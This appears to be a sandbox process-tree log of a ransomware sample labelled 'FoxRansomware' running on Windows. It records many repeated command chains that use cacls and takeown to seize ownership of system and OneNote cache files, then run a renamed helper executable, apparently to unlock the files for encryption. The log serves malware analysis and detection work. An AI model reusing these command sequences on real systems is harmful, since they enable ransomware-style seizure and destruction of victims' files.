C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000A9.bin" -nobanner4⤵PID:404
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:1484
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:4348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Modifies file permissions
PID:2576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "behavior.xml" -nobanner3⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "behavior.xml" -nobanner4⤵PID:7156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:5384
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:6016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:5168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:6260
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:6220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:5580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""2⤵PID:6304
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C3⤵PID:6088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"3⤵
- Modifies file permissions
PID:2176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edbres00002.jrs" -nobanner3⤵PID:3624
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edbres00002.jrs" -nobanner4⤵PID:5820
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""2⤵PID:5344
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C3⤵PID:3236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"3⤵
- Modifies file permissions
PID:6316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner3⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner4⤵PID:620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""2⤵PID:6288
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C3⤵PID:6436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"3⤵PID:6372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner3⤵PID:6348
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner4⤵PID:6368
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""2⤵PID:6072
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C3⤵PID:6384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"3⤵PID:8148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftWordpad.xml" -nobanner3⤵PID:6448
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftWordpad.xml" -nobanner4⤵PID:6644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:6488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:6432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:6552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "watermark.png" -nobanner3⤵PID:6676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "watermark.png" -nobanner4⤵PID:3944
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:6668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:6748
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:6520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵PID:6820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:6920
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:6744
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKPOINTDATA.xml""2⤵PID:1380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKPOINTDATA.xml" /E /G Admin:F /C3⤵PID:6980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKPOINTDATA.xml"3⤵PID:7004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "WINDOWS.PERFTRACKPOINTDATA.xml" -nobanner3⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "WINDOWS.PERFTRACKPOINTDATA.xml" -nobanner4⤵PID:6956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""2⤵PID:5336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C3⤵PID:5108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"3⤵PID:5392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner3⤵PID:7372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner4⤵PID:2208
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""2⤵PID:7824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C3⤵PID:3680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"3⤵PID:4768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edb.chk" -nobanner3⤵PID:7440
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edb.chk" -nobanner4⤵PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:4044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:7820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵PID:372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:7256
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵PID:7900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:7780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:3644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵
- Modifies file permissions
PID:7656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:7660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:7728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵
- Modifies file permissions
PID:2316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:7760
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵PID:7684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:7596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:7688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
PID:7952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:8044
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:8000
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""2⤵PID:7928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C3⤵PID:8180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"3⤵
- Modifies file permissions
PID:5832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000004.bin" -nobanner3⤵PID:8172
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000004.bin" -nobanner4⤵PID:8116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""2⤵PID:7676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C3⤵PID:8076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"3⤵PID:6132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000H.bin" -nobanner3⤵PID:7084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000H.bin" -nobanner4⤵PID:7064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""2⤵PID:8164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C3⤵PID:2812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"3⤵PID:3636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000S.bin" -nobanner3⤵PID:7332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000S.bin" -nobanner4⤵PID:5904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""2⤵PID:7036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C3⤵PID:5360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"3⤵
- System Location Discovery: System Language Discovery
PID:4324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000016.bin" -nobanner3⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000016.bin" -nobanner4⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""2⤵PID:5164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C3⤵PID:6004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"3⤵PID:3016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000050.bin" -nobanner3⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000050.bin" -nobanner4⤵PID:5248
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""2⤵PID:4188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C3⤵PID:7120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"3⤵PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000006S.bin" -nobanner3⤵PID:5332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000006S.bin" -nobanner4⤵PID:5236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin""2⤵PID:5044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C3⤵PID:6032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"3⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000076.bin" -nobanner3⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000076.bin" -nobanner4⤵PID:5996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin""2⤵PID:7128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C3⤵PID:5304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"3⤵PID:5504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000007G.bin" -nobanner3⤵PID:3672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000007G.bin" -nobanner4⤵PID:6196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin""2⤵PID:2480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C3⤵PID:5464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"3⤵PID:6164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000007Q.bin" -nobanner3⤵PID:7148
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000007Q.bin" -nobanner4⤵PID:4456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin""2⤵PID:7884
-
